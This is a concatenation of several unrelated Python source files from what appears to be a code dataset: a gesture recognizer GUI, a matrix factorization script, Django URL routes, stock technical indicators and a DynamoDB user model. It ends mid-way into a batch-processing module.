curr[j]!=word[j]:\n# dif+=1\n# if dif>=2:\n# dif=0\n# break\n# if dif==1:\n# if word==endWord:\n# return lay\n# selected[i]=True\n# queue.append(word)\n# dif=0\n# return 0","sub_path":"Week_07/G20200389010076/LeetCode_127_0076.py","file_name":"LeetCode_127_0076.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511190103","text":"# Copyright 2018 Ryohei Kamiya \r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\r\nfrom logzero import logger\r\nimport sys\r\nimport argparse\r\nimport os\r\nimport os.path\r\nimport tkinter\r\nimport datetime\r\nimport pointsbuffer\r\nfrom PIL import Image, ImageDraw\r\n\r\nimport numpy as np\r\nfrom numpy.random import seed\r\n\r\nfrom tfkeras_mlp import MLP\r\nfrom tfkeras_lenet import LeNet\r\nfrom tfkeras_lstm_with_baseshift import LSTM\r\n\r\ndef get_args(mlp_model_params_path=\"mlp-parameters.h5\", lenet_model_params_path=\"lenet-parameters.h5\",\r\n lstm_model_params_path=\"lstm-parameters.h5\", labels_path=\"labels.txt\",\r\n x_length=64, x_input_length=16, x_split_step=1, width=28, height=28,\r\n lstm_units=32, description=None):\r\n if description is None:\r\n description = \"Gesture recognizer\"\r\n parser = argparse.ArgumentParser(description)\r\n parser.add_argument(\"--net\", \"-n\", type=str,\r\n default='mlp',\r\n help=\"Neural network architecure type : ('mlp'|'lenet'|'mlp-with-lstm')\")\r\n parser.add_argument(\"--mlp-model-params-path\", \"-mlp\",\r\n type=str, default=mlp_model_params_path,\r\n help='Path of the mlp model parameters file.')\r\n parser.add_argument(\"--lenet-model-params-path\", \"-lenet\",\r\n type=str, default=lenet_model_params_path,\r\n help='Path of the lenet model parameters file.')\r\n parser.add_argument(\"--lstm-model-params-path\", \"-lstm\",\r\n type=str, default=lstm_model_params_path,\r\n help='Path of the lstm model parameters file.')\r\n parser.add_argument(\"--labels-path\", \"-l\",\r\n type=str, default=labels_path,\r\n help='Path of the labels file.')\r\n parser.add_argument(\"--x-length\", \"-xl\", type=int, default=x_length,\r\n help='Length of time-series into the mlp network.')\r\n parser.add_argument(\"--x-input-length\", \"-xil\", type=int, default=x_input_length,\r\n help='Length of time-series into the lstm network.')\r\n parser.add_argument(\"--x-split-step\", \"-xss\", type=int, default=x_split_step,\r\n help='Step size to split time-series.')\r\n parser.add_argument(\"--width\", \"-wt\", type=int, default=width,\r\n help='Image width.')\r\n parser.add_argument(\"--height\", \"-ht\", type=int, default=height,\r\n help='Image height.')\r\n parser.add_argument(\"--lstm-units\", \"-lstmu\", type=int, default=lstm_units,\r\n help='The number of LSTM units.')\r\n args = parser.parse_args()\r\n return args\r\n\r\nclass GestureRecognizer:\r\n def __init__(self, args):\r\n class Config:\r\n pass\r\n self._config = Config()\r\n self._config.process = 'infer'\r\n self._config.columns_size = 2\r\n self._config.x_length = args.x_length\r\n self._config.x_input_length = args.x_input_length\r\n self._config.x_split_step = args.x_split_step\r\n self._config.width = args.width\r\n self._config.height = args.height\r\n self._config.lstm_units = args.lstm_units\r\n self._config.batch_size = 1\r\n self._config.epochs = 0\r\n self._config.validation_split = 0.0\r\n self._config.learning_rate = 0.0\r\n self._config.training_dataset_path = None\r\n self._config.evaluation_dataset_path = None\r\n\r\n self._net_type = args.net\r\n logger.info(\"Network type is {}.\".format(self._net_type))\r\n self._mlp = None\r\n self._lenet = None\r\n self._lstm = None\r\n\r\n if self._net_type == 'mlp':\r\n self._config.model_params_path = args.mlp_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._mlp = MLP(self._config)\r\n self._mlp.init_for_infer()\r\n elif self._net_type == 'lenet':\r\n self._config.model_params_path = args.lenet_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._lenet = LeNet(self._config)\r\n self._lenet.init_for_infer()\r\n elif self._net_type == 'mlp-with-lstm':\r\n self._config.model_params_path = args.lstm_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._lstm = LSTM(self._config)\r\n self._lstm.init_for_infer()\r\n self._config.model_params_path = args.mlp_model_params_path\r\n if not os.path.isfile(self._config.model_params_path):\r\n logger.error(\"Model params path {} is not found.\".format(self._config.model_params_path))\r\n else:\r\n logger.info(\"Path of the model parameters file is {}.\".format(self._config.model_params_path))\r\n self._mlp = MLP(self._config)\r\n self._mlp.init_for_infer()\r\n else:\r\n raise ValueError(\"Unknown network type {}\".format(self._net_type))\r\n self._labels = None\r\n self._labels_path = args.labels_path\r\n if not os.path.isfile(self._labels_path):\r\n logger.error(\"Labels path {} is not found.\".format(self._labels_path))\r\n else:\r\n logger.info(\"Path of the labels file is {}.\".format(self._labels_path))\r\n with open(self._labels_path) as f:\r\n self._labels = f.readlines()\r\n self._points_buf = pointsbuffer.PointsBuffer()\r\n\r\n def _diff_points(self, points):\r\n result = []\r\n if len(points) > 1:\r\n p0 = points[0]\r\n for p1 in points[1:]:\r\n result.append([p1[0] - p0[0], p1[1] - p0[1]])\r\n p0 = p1\r\n return result\r\n\r\n def _undiff_points(self, diff_points, start_point=[0, 0]):\r\n result = []\r\n if len(diff_points) > 0:\r\n p0 = start_point\r\n for dp in diff_points:\r\n p1 = [p0[0]+dp[0], p0[1]+dp[1]]\r\n result.append(p1)\r\n p0 = p1\r\n return result\r\n\r\n def _subtract_point_from_points(self, points, point):\r\n return [[p[0]-point[0], p[1]-point[1]] for p in points]\r\n\r\n def _add_point_to_points(self, points, point):\r\n return [[p[0]+point[0], p[1]+point[1]] for p in points]\r\n\r\n def _standardize(self, points):\r\n result = []\r\n for point in points:\r\n result.append((point[0] / 128.0 - 1.0, point[1] / 128.0 - 1.0))\r\n return result\r\n\r\n def _unstandardize(self, points):\r\n result = []\r\n for point in points:\r\n result.append(((point[0] + 1.0) * 128.0, (point[1] + 1.0) * 128.0))\r\n return result\r\n\r\n def _normalize(self, points):\r\n result = []\r\n minx = float(\"inf\")\r\n miny = float(\"inf\")\r\n maxx = float(\"-inf\")\r\n maxy = float(\"-inf\")\r\n for point in points:\r\n minx = float(point[0]) if minx > point[0] else minx\r\n miny = float(point[1]) if miny > point[1] else miny\r\n maxx = float(point[0]) if maxx < point[0] else maxx\r\n maxy = float(point[1]) if maxy < point[1] else maxy\r\n width = maxx - minx\r\n height = maxy - miny\r\n midx = (maxx + minx) * 0.5\r\n midy = (maxy + miny) * 0.5\r\n scale = width if width > height else height\r\n for point in points:\r\n result.append(((point[0] - midx) * 0.8 / scale, (point[1] - midy) * 0.8 / scale))\r\n return result\r\n\r\n def _get_image(self, points):\r\n image = Image.new('L', (28, 28), (255))\r\n draw = ImageDraw.Draw(image)\r\n for i in range(len(points) - 1):\r\n x0 = int((points[i][0]+1.0) * 14.0)\r\n y0 = int((points[i][1]+1.0) * 14.0)\r\n x1 = int((points[i+1][0]+1.0) * 14.0)\r\n y1 = int((points[i+1][1]+1.0) * 14.0)\r\n x0 = 27 if x0 > 27 else (0 if x0 < 0 else x0)\r\n y0 = 27 if y0 > 27 else (0 if y0 < 0 else y0)\r\n x1 = 27 if x1 > 27 else (0 if x1 < 0 else x1)\r\n y1 = 27 if y1 > 27 else (0 if y1 < 0 else y1)\r\n draw.line((x0, y0, x1, y1), fill=0)\r\n return np.asarray(image)\r\n\r\n def get_network_type(self):\r\n return self._net_type\r\n\r\n # predict next points\r\n def predict(self, points):\r\n tmp_points = self._standardize(points)\r\n for i in range(0, self._config.x_input_length, self._config.x_split_step):\r\n xin = self._subtract_point_from_points(\r\n tmp_points[-self._config.x_input_length:],\r\n tmp_points[-1])\r\n xout = self._lstm.infer(np.asarray(xin)).tolist()\r\n pred = self._add_point_to_points(xout, tmp_points[-1])\r\n tmp_points.extend(pred)\r\n return self._unstandardize(tmp_points)\r\n\r\n # recognize a gesture\r\n def infer(self, points, stroke_terminal=True):\r\n result_label = None\r\n result_points = []\r\n if self._net_type == 'mlp':\r\n self._points_buf.set_points(points)\r\n self._points_buf.adjust()\r\n points = self._points_buf.get_points()\r\n result_label = self._mlp.infer(np.asarray(points))\r\n elif self._net_type == 'lenet':\r\n points = self._normalize(points)\r\n image = self._get_image(points)\r\n result_label = self._lenet.infer(image/255.0)\r\n else:\r\n if not stroke_terminal :\r\n tmp_points = self.predict(points)\r\n result_points = tmp_points[len(points):]\r\n points = tmp_points\r\n self._points_buf.set_points(points)\r\n self._points_buf.adjust()\r\n points = self._points_buf.get_points()\r\n result_label = self._mlp.infer(np.asarray(points))\r\n if self._labels is not None and result_label is not None:\r\n result_label = self._labels[result_label]\r\n return (result_label, result_points)\r\n\r\nclass GesturePainter:\r\n def __init__(self, args):\r\n self._config = args\r\n\r\n self._minx = 0\r\n self._miny = 0\r\n self._maxx = 255\r\n self._maxy = 255\r\n self._output_dir = None\r\n self._x = 0\r\n self._y = 0\r\n self._points = []\r\n self._pred_points = []\r\n self._recognizer = None\r\n self._window = None\r\n self._canvas = None\r\n self._result_area = None\r\n self._result_txt = None\r\n self._points_buf = pointsbuffer.PointsBuffer()\r\n self._initWindow()\r\n\r\n def _initWindow(self):\r\n self._window = tkinter.Tk()\r\n self._window.title('Gesture Recognizer')\r\n\r\n self._canvas = tkinter.Canvas(self._window, bg = \"white\", width = self._maxx + 1 - self._minx, height = self._maxy + 1 - self._miny)\r\n self._canvas.pack()\r\n self._canvas.bind(\"\", self._on_canvas_pressed)\r\n self._canvas.bind(\"\", self._on_canvas_released)\r\n self._canvas.bind(\"\", self._on_canvas_dragged)\r\n\r\n quitBtn = tkinter.Button(self._window, text = \"QUIT\", command = self._window.quit)\r\n quitBtn.pack(side = tkinter.RIGHT)\r\n\r\n self._result_txt = tkinter.StringVar()\r\n self._result_txt.set(\"\")\r\n\r\n self._result_area = tkinter.Label(self._window, textvariable = self._result_txt, anchor = tkinter.N, height = 1, font=2)\r\n self._result_area.pack(side = tkinter.LEFT)\r\n\r\n def _fulfill_interpolation(self, points):\r\n self._points_buf.set_points(points)\r\n self._points_buf.fulfill_linear_interpolation()\r\n return self._points_buf.get_points()\r\n\r\n def _on_canvas_pressed(self, event):\r\n self._canvas.delete(\"all\")\r\n self._points = []\r\n if self._minx <= event.x and event.x <= self._maxx:\r\n if self._miny <= event.y and event.y <= self._maxy:\r\n self._x = event.x\r\n self._y = event.y\r\n\r\n def _on_canvas_released(self, event):\r\n result_label, _ = self._recognizer.infer(self._points)\r\n if result_label is not None:\r\n self._result_txt.set(\"You drew \" + result_label)\r\n\r\n def _draw_line(self, p0, p1, color, width=1):\r\n self._canvas.create_line(p0[0], p0[1], p1[0], p1[1], fill = color, width=width)\r\n\r\n def _show_prediction(self):\r\n if len(self._points) % self._config.x_split_step == 0 and \\\r\n len(self._points) >= self._config.x_input_length:\r\n result_label, result_points = self._recognizer.infer(self._points, False)\r\n if len(self._pred_points) > 1:\r\n p2 = self._pred_points[0]\r\n for p3 in self._pred_points[1:]:\r\n self._draw_line(p2, p3, color=\"white\", width=2)\r\n p2 = p3\r\n if len(result_points) > 1:\r\n p2 = result_points[0]\r\n for p3 in result_points[1:]:\r\n self._draw_line(p2, p3, color=\"red\", width=2)\r\n p2 = p3\r\n self._pred_points = result_points\r\n if result_label is not None:\r\n self._result_txt.set(\"You will draw \" + result_label)\r\n\r\n def _on_canvas_dragged(self, event):\r\n if self._minx <= event.x and event.x <= self._maxx:\r\n if self._miny <= event.y and event.y <= self._maxy:\r\n p0 = [self._x, self._y]\r\n p1 = [event.x, event.y]\r\n points = self._fulfill_interpolation([p0, p1])[:-1]\r\n self._points.extend(points)\r\n self._x = event.x\r\n self._y = event.y\r\n if self._recognizer.get_network_type() == 'mlp-with-lstm':\r\n self._show_prediction()\r\n self._draw_line(p0, p1, color=\"black\", width=2)\r\n\r\n def _on_clear_btn_pressed(self):\r\n self._canvas.delete(\"all\")\r\n self._points = []\r\n\r\n def run(self):\r\n self._recognizer = GestureRecognizer(self._config)\r\n self._window.mainloop()\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n GesturePainter(args).run()\r\n sys.exit(0)\r\n","sub_path":"src/tfkeras_gesture_recognizer.py","file_name":"tfkeras_gesture_recognizer.py","file_ext":"py","file_size_in_byte":15339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405418554","text":"import numpy as np \n\ndef MF(Y,K=2,B=0.001,lam=0.03,stop=3000):\n\tW = np.random.randn(Y.shape[0],K)\n\t#print W\n\tH = np.random.randn(K,Y.shape[1])\n\t#print H\n\tU = Y.shape[0]\n\tI = Y.shape[1]\n\tR = np.sum(Y)\n\t#print Y\n\tdem=0\n\twhile (dem 0:\n\t\t\t\t\t\t\te = e + pow(Y[i][j] - W[u,:].dot(H[:,i]), 2)\n\t\t\t\t\t\t\tfor k in range(K):\n\t\t\t\t\t\t\t\te = e + (lam/2) * ( pow(W[i][k],2) + pow(H[k][j],2) )\n\t\t\t\t\t\t\t\tif e < 0.001:\n\t\t\t\t\t\t\t\t\tbreak\n\n\treturn W,H \nY=np.array([[10,24,0,42],[31,0,0,42],[0,53,0,94],[32,0,24,12]])\nX,H=MF(Y)\n#print X\nY_bar = X.dot(H)\t\nfor i in range(4):\n\tfor j in range(4):\n\t\tprint ('%.8f '%Y_bar[i][j] ,end='')\n\tprint ()","sub_path":"hethonggoiy/tonghop/MF_thayhieu.py","file_name":"MF_thayhieu.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357310920","text":"\"\"\"webproj URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import url\r\nfrom django.contrib import admin, auth\r\nfrom app import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.home, name='home'),\r\n url(r'^album/(?P[\\w|\\W]+)/(?P[\\w|\\W]+)$', views.album, name='album'),\r\n url(r'^artist/(?P[\\w|\\W]+)$', views.artist, name='artist'),\r\n url(r'^tag/(?P[\\w|\\W]+)$', views.tag, name='tag'),\r\n url(r'^news/$', views.news, name='news'),\r\n url(r'^search/$', views.search, name='search'),\r\n url(r'^top/tags/$', views.topArtistsByTag, name='topTags'),\r\n url(r'^top/countries/$', views.topArtistsByCountry, name='topCountries'),\r\n # url(r'^top/tags/(?P[0-9]+)$', views.topTagsPage),\r\n url(r'^top/artists/$', views.topArtists, name='topArtists'),\r\n url(r'^top/artists/(?P[0-9]+)$', views.topArtistsPage, name='topArtistsPage'),\r\n url(r'^top/tracks/$', views.topTracks, name='topTracks'),\r\n url(r'^top/tracks/(?P[0-9]+)$', views.topTracksPage, name='topTracksPage'),\r\n]\r\n","sub_path":"webproj/webproj/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607707365","text":"import pandas as pd\nimport numpy as np\nfrom statistics import mean\nfrom math import fabs\nfrom LogMessage import TechnicalIndexMessage\nfrom logging import getLogger\nlogger = getLogger()\n\n\ndef GetExponentialMovingAverage(calculateSourceDataFrame, calculate_parameter, calculateSourceColumnName, returnDataFrameColumnName):\n\n if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n logger.info(TechnicalIndexMessage.sourceDataFrameError_EMA)\n return None\n\n if len(calculateSourceDataFrame) < calculate_parameter:\n logger.info(TechnicalIndexMessage.calculateParameterError_EMA)\n return None\n\n if calculateSourceColumnName not in calculateSourceDataFrame:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_EMA % calculateSourceColumnName)\n return None\n\n calculateSourceData = calculateSourceDataFrame[calculateSourceColumnName].values\n\n firstEMA = mean(calculateSourceData[0:calculate_parameter])\n exponentialMovingAverage = [firstEMA]\n\n smoothingExponential = 2 / (calculate_parameter + 1)\n\n for idx in range(calculate_parameter, len(calculateSourceData)):\n before_EMA = exponentialMovingAverage[-1]\n current_Amount = before_EMA + smoothingExponential * (calculateSourceData[idx] - before_EMA)\n exponentialMovingAverage.append(current_Amount)\n\n return pd.DataFrame(exponentialMovingAverage, columns=[returnDataFrameColumnName])\n\n\ndef GetMACD(calculateSourceDataFrame, calculateSourceColumnName, baseLine_parameter, relativeLine_parameter, signal_parameter, MACDDataFrameColumnName, signalDataFrameColumnName):\n\n if baseLine_parameter > relativeLine_parameter:\n logger.info(TechnicalIndexMessage.baseLineAndRelativeLineParameterError_MACD)\n return None, None\n\n if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n logger.info(TechnicalIndexMessage.sourceDataFrameError_MACD)\n return None, None\n\n if calculateSourceColumnName not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_MACD % calculateSourceColumnName)\n return None, None\n\n baseLineDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=calculateSourceDataFrame, calculate_parameter=baseLine_parameter, calculateSourceColumnName=calculateSourceColumnName, returnDataFrameColumnName='基準線')\n relativeLineDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=calculateSourceDataFrame, calculate_parameter=relativeLine_parameter, calculateSourceColumnName=calculateSourceColumnName, returnDataFrameColumnName='相対線')\n\n if baseLineDataFrame is None or len(baseLineDataFrame) == 0:\n logger.info(TechnicalIndexMessage.baseLineDataFrameError_MACD)\n return None, None\n\n if relativeLineDataFrame is None or len(relativeLineDataFrame) == 0:\n logger.info(TechnicalIndexMessage.relativeLineDataFrameError_MACD)\n return None, None\n\n baseLineList = baseLineDataFrame.values\n relativeLineList = relativeLineDataFrame.values\n\n calculated_MACDlist = []\n for idx in range(len(relativeLineList)):\n calculated_MACDlist.append(baseLineList[idx + relativeLine_parameter - baseLine_parameter] - relativeLineList[idx])\n\n if len(calculated_MACDlist) == 0:\n logger.info(TechnicalIndexMessage.MACDcalculateError_MACD)\n return None, None\n\n MACD_DataFrame = pd.DataFrame(calculated_MACDlist, columns=[MACDDataFrameColumnName])\n signalDataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=MACD_DataFrame, calculate_parameter=signal_parameter, calculateSourceColumnName=MACDDataFrameColumnName, returnDataFrameColumnName=signalDataFrameColumnName)\n\n return MACD_DataFrame, signalDataFrame\n\n\ndef __GetDM(todayHigh, todayLow, previousHigh, previousLow):\n\n if len(todayHigh) != len(todayLow) != len(previousHigh) != len(previousLow):\n return None, None\n\n calculateLength = len(todayHigh)\n\n plusDM = np.array([todayHigh[idx] - previousHigh[idx] for idx in range(calculateLength)])\n minusDM = np.array([previousLow[idx] - todayLow[idx] for idx in range(calculateLength)])\n\n for idx in range(calculateLength):\n if plusDM[idx] < 0 and minusDM[idx] < 0:\n plusDM[idx] = 0\n minusDM[idx] = 0\n continue\n\n if plusDM[idx] > minusDM[idx]:\n plusDM[idx] = todayHigh[idx] - previousHigh[idx]\n minusDM[idx] = 0\n continue\n\n if plusDM[idx] < minusDM[idx]:\n plusDM[idx] = 0\n minusDM[idx] = previousLow[idx] - todayLow[idx]\n continue\n\n if plusDM[idx] == minusDM[idx]:\n plusDM[idx] = 0\n minusDM[idx] = 0\n continue\n\n return plusDM, minusDM\n\n\ndef __GetTrueRange(todayHigh, todayLow, previousHigh, previousLow, previousClose):\n\n if len(todayHigh) != len(todayLow) != len(previousHigh) != len(previousLow) != len(previousClose):\n return None\n\n calculateLength = len(todayHigh)\n trueRangeList = []\n for idx in range(calculateLength):\n trueRangeCandidate_1 = fabs(todayHigh[idx] - todayLow[idx])\n trueRangeCandidate_2 = fabs(todayHigh[idx] - previousClose[idx])\n trueRangeCandidate_3 = fabs(previousClose[idx] - todayLow[idx])\n trueRangeList.append(max(trueRangeCandidate_1, trueRangeCandidate_2, trueRangeCandidate_3))\n\n return np.array(trueRangeList)\n\n\ndef __GetDI(plusDM, minusDM, trueRange, DI_Parameter):\n\n if len(plusDM) != len(minusDM) != len(trueRange):\n return None, None\n\n calculateLength = len(plusDM)\n\n if calculateLength < DI_Parameter:\n return None, None\n\n plusDIlist = []\n minusDIlist = []\n for idx in range(calculateLength - DI_Parameter + 1):\n plusDIlist.append(sum(plusDM[idx:DI_Parameter + idx]) / sum(trueRange[idx:DI_Parameter + idx]) * 100)\n minusDIlist.append(sum(minusDM[idx:DI_Parameter + idx]) / sum(trueRange[idx:DI_Parameter + idx]) * 100)\n\n return np.array(plusDIlist), np.array(minusDIlist)\n\n\ndef __GetDX(plusDI, minusDI, DXdataFrameColumnName):\n\n if len(plusDI) != len(minusDI):\n return None\n\n calculateLength = len(plusDI)\n\n DXlist = []\n for idx in range(calculateLength):\n DXlist.append(fabs(plusDI[idx] - minusDI[idx]) / (plusDI[idx] + minusDI[idx]) * 100)\n\n return pd.DataFrame(np.array(DXlist), columns=[DXdataFrameColumnName])\n\n\ndef GetDMIandADX(calculateSourceDataFrame, calculateSourceColumnName_TodayHigh, calculateSourceColumnName_TodayLow,\n calculateSourceColumnName_PreviousHigh, calculateSourceColumnName_PreviousLow, calculateSourceColumnName_PreviousClose,\n plusDIcolumnName, minusDIcolumnName, DI_Parameter, ADX_Parameter, ADXcolumnName):\n\n if calculateSourceDataFrame is None or len(calculateSourceDataFrame) == 0:\n logger.info(TechnicalIndexMessage.sourceDataFrameError_DMIandADX)\n return None, None, None\n\n if calculateSourceColumnName_TodayHigh not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_TodayHigh)\n return None, None, None\n\n if calculateSourceColumnName_TodayLow not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_TodayLow)\n return None, None, None\n\n if calculateSourceColumnName_PreviousHigh not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_PreviousHigh)\n return None, None, None\n\n if calculateSourceColumnName_PreviousLow not in calculateSourceDataFrame.columns:\n logger.info(TechnicalIndexMessage.calculateSourceColumnError_DMIandADX % calculateSourceColumnName_PreviousLow)\n return None, None, None\n\n if len(calculateSourceDataFrame) < DI_Parameter:\n logger.info(TechnicalIndexMessage.calculateParameterError_DMIandADX)\n return None, None, None\n\n todayHighList = calculateSourceDataFrame[calculateSourceColumnName_TodayHigh].values\n todayLowList = calculateSourceDataFrame[calculateSourceColumnName_TodayLow].values\n previousHighList = calculateSourceDataFrame[calculateSourceColumnName_PreviousHigh].values\n previousLowList = calculateSourceDataFrame[calculateSourceColumnName_PreviousLow].values\n previousCloseList = calculateSourceDataFrame[calculateSourceColumnName_PreviousClose].values\n\n plusDM, minusDM = __GetDM(todayHighList, todayLowList, previousHighList, previousLowList)\n if plusDM is None or minusDM is None:\n logger.info(TechnicalIndexMessage.calculateDMError_DMIandADX)\n return None, None, None\n\n trueRange = __GetTrueRange(todayHighList, todayLowList, previousHighList, previousLowList, previousCloseList)\n if trueRange is None:\n logger.info(TechnicalIndexMessage.calculateTrueRangeError_DMIandADX)\n return None, None, None\n\n plusDI, minusDI = __GetDI(plusDM, minusDM, trueRange, DI_Parameter)\n if plusDI is None or minusDI is None:\n logger.info(TechnicalIndexMessage.calculateDIError_DMIandADX)\n return None, None, None\n\n DXdataFrameColumnName = 'DX'\n DXdataFrame = __GetDX(plusDI, minusDI, DXdataFrameColumnName)\n if DXdataFrame is None:\n logger.info(TechnicalIndexMessage.calculateDXError_DMIandADX)\n return None, None, None\n\n plusDIdataFrame = pd.DataFrame(np.array(plusDI), columns=[plusDIcolumnName])\n minusDIdataFrame = pd.DataFrame(np.array(minusDI), columns=[minusDIcolumnName])\n ADXdataFrame = GetExponentialMovingAverage(calculateSourceDataFrame=DXdataFrame, calculate_parameter=ADX_Parameter, calculateSourceColumnName=DXdataFrameColumnName, returnDataFrameColumnName=ADXcolumnName)\n\n return plusDIdataFrame, minusDIdataFrame, ADXdataFrame\n\n","sub_path":"main/stockPriceAnalize/TechnicalIndex.py","file_name":"TechnicalIndex.py","file_ext":"py","file_size_in_byte":9929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"420491281","text":"from pynamodb.models import Model\nfrom pynamodb.attributes import UnicodeAttribute, JSONAttribute, BooleanAttribute, NumberSetAttribute, NumberAttribute, UTCDateTimeAttribute, UnicodeSetAttribute\nfrom pynamodb.indexes import GlobalSecondaryIndex, AllProjection\nfrom datetime import datetime\n\n\nclass TimeIndex(GlobalSecondaryIndex):\n \"\"\"\n This class represents a global secondary index\n \"\"\"\n class Meta:\n index_name = 'time-index'\n read_capacity_units = 1\n write_capacity_units = 1\n projection = AllProjection()\n time = NumberAttribute(default=9, hash_key=True)\n\n\n\nclass Users(Model):\n class Meta:\n table_name = 'motivora-users'\n\n # Metadata Fields\n phone = NumberAttribute(hash_key=True)\n message_set = UnicodeAttribute(default='EBNHC')\n lang_code = UnicodeAttribute(default='en')\n prev_message = NumberAttribute(default=0)\n send_message = BooleanAttribute(default=True)\n time = NumberAttribute(default=9)\n messages_sent = NumberSetAttribute(default=[0])\n attr_scores = JSONAttribute(null=True)\n preferred_attrs = UnicodeSetAttribute(default=[])\n created_time = UTCDateTimeAttribute(default=datetime.now(), null=False)\n is_real_user = BooleanAttribute(default=True)\n welcome_message_received = BooleanAttribute(default=False)\n next_phone_call = UnicodeAttribute(default='-', null=True)\n\n # Message response fields\n message_response = JSONAttribute(default={}, null=True)\n weekly_goals_message_response = JSONAttribute(default={}, null=True)\n direct_message_response = JSONAttribute(default={}, null=True)\n weekly_progress_message_response = JSONAttribute(default={}, null=True)\n\n # Indices\n time_index = TimeIndex()\n\n def to_json(self):\n json = self.to_dict()\n json['messages_sent'] = list(json['messages_sent'])\n json['preferred_attrs'] = list(json['preferred_attrs'])\n return json\n\n def to_dict(self):\n created_at = str(self.created_time)\n return {\n 'phone': self.phone,\n 'message_set': self.message_set,\n 'lang_code': self.lang_code,\n 'time': self.time,\n 'prev_message': self.prev_message,\n 'send_message': self.send_message,\n 'messages_sent': self.messages_sent,\n 'attr_scores': self.attr_scores,\n 'preferred_attrs': self.preferred_attrs,\n 'message_response': self.message_response,\n 'weekly_goals_message_response': self.weekly_goals_message_response,\n 'weekly_progress_message_response': self.weekly_progress_message_response,\n 'direct_message_response': self.direct_message_response,\n 'created_time': created_at,\n 'is_real_user': self.is_real_user,\n 'welcome_message_received': self.welcome_message_received,\n 'next_phone_call': self.next_phone_call\n }\n\n def to_frontend(self):\n created_at = str(self.created_time)\n num_sent_messages = len(list(self.messages_sent))\n num_rated_messages = 0\n total_rating = 0\n for i, response_data in self.message_response.items():\n if 'message' in response_data:\n total_rating += int(response_data['message'])\n num_rated_messages += 1\n avg_rating = None\n if num_rated_messages > 0:\n avg_rating = round(total_rating * 1.0 / num_rated_messages, 1)\n return {\n 'phone': self.phone,\n 'time': self.time,\n 'message_set': self.message_set,\n 'send_message': self.send_message,\n 'lang_code': self.lang_code,\n 'created_time': created_at,\n 'preferred_attrs': list(self.preferred_attrs),\n 'num_sent_messages': num_sent_messages,\n 'num_rated_messages': num_rated_messages,\n 'average_rating': avg_rating,\n 'is_real_user': self.is_real_user,\n 'next_phone_call': self.next_phone_call\n }\n","sub_path":"chalicelib/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"87115851","text":"\"\"\"\nThis module contains PartSeg function used for calculate in batch processing\n\nCalculation hierarchy:\n\n.. graphviz::\n\n digraph calc {\n rankdir=\"LR\";\n \"CalculationManager\"[shape=rectangle style=filled];\n \"BatchManager\"[shape=rectangle];\n \"BatchWorker\"[shape=rectangle];\n \"CalculationManager\" -> \"BatchManager\" -> \"BatchWorker\"[arrowhead=\"crow\"];\n\n \"CalculationManager\" -> \"DataWriter\"[arrowhead=\"inv\"];\n \"DataWriter\"[shape=rectangle];\n \"FileData\"[shape=rectangle];\n \"SheetData\"[shape=rectangle];\n \"DataWriter\" -> \"FileData\" -> \"SheetData\"[arrowhead=\"crow\"];\n }\n\n\"\"\"\nimport contextlib\nimport json\nimport logging\nimport math\nimport os\nimport threading\nimport traceback\nimport uuid\nfrom collections import OrderedDict\nfrom enum import Enum\nfrom os import path\nfrom queue import Queue\nfrom traceback import StackSummary\nfrom typing import 